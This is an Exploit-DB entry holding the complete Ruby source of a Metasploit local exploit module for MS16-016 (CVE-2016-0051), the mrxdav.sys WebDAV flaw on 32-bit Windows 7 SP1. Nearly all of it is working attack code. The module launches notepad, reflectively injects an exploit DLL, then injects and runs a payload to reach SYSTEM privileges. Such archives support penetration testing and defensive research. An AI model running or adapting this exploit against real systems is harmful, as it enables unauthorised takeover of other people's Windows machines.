Microsoft Windows 7 SP1 - 'mrxdav.sys' WebDAV Privilege Escalation (MS16-016) (Metasploit)

EDB-ID:

40085


Author:

Metasploit

Type:

local


Platform:

Windows

Date:

2016-07-11


##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'msf/core/post/windows/reflective_dll_injection'
require 'rex'

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Process
  include Msf::Post::Windows::FileInfo
  include Msf::Post::Windows::ReflectiveDLLInjection

  def initialize(info={})
    super(update_info(info, {
      'Name'           => 'MS16-016 mrxdav.sys WebDav Local Privilege Escalation',
      'Description'    => %q{
        This module exploits the vulnerability in mrxdav.sys described by MS16-016.  The module will spawn
        a process on the target system and elevate it's privileges to NT AUTHORITY\SYSTEM before executing
        the specified payload within the context of the elevated process.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Tamas Koczka',                               # Original Exploit
          'William Webb <william_webb[at]rapid7.com>'   # C port and Metasploit module
        ],
      'Arch'           => ARCH_X86,
      'Platform'       => 'win',
      'SessionTypes'   => [ 'meterpreter' ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
          'DisablePayloadHandler' => 'false'
        },
      'Targets'        =>
        [
          [ 'Windows 7 SP1', { } ]
        ],
      'Payload'        =>
        {
          'Space'       => 4096,
          'DisableNops' => true
        },
      'References'     =>
        [
          [ 'CVE', '2016-0051' ],
          [ 'MSB', 'MS16-016'  ]
        ],
      'DisclosureDate' => 'Feb 09 2016',
      'DefaultTarget'  => 0
    }))
  end

  def check
    if sysinfo["Architecture"] =~ /wow64/i or sysinfo["Architecture"] =~ /x64/
      return Exploit::CheckCode::Safe
    end

    Exploit::CheckCode::Detected
  end

  def exploit
    if is_system?
      fail_with(Failure::None, 'Session is already elevated')
    end

    if sysinfo["Architecture"] =~ /wow64/i
      fail_with(Failure::NoTarget, "Running against WOW64 is not supported")
    elsif sysinfo["Architecture"] =~ /x64/
      fail_with(Failure::NoTarget, "Running against 64-bit systems is not supported")
    end

    print_status("Launching notepad to host the exploit...")
    notepad_process_pid = cmd_exec_get_pid("notepad.exe")
    begin
      process = client.sys.process.open(notepad_process_pid, PROCESS_ALL_ACCESS)
      print_good("Process #{process.pid} launched.")
    rescue Rex::Post::Meterpreter::RequestError
      print_status("Operation failed. Hosting exploit in the current process...")
      process = client.sys.process.open
    end

    print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
    library_path = ::File.join(Msf::Config.data_directory, "exploits", "cve-2016-0051", "cve-2016-0051.x86.dll")
    library_path = ::File.expand_path(library_path)
    exploit_mem, offset = inject_dll_into_process(process, library_path)
    print_status("Exploit injected ... injecting payload into #{process.pid}...")
    payload_mem = inject_into_process(process, payload.encoded)
    thread = process.thread.create(exploit_mem + offset, payload_mem)
    sleep(3)
    print_status("Done.  Verify privileges manually or use 'getuid' if using meterpreter to verify exploitation.")
  end
 end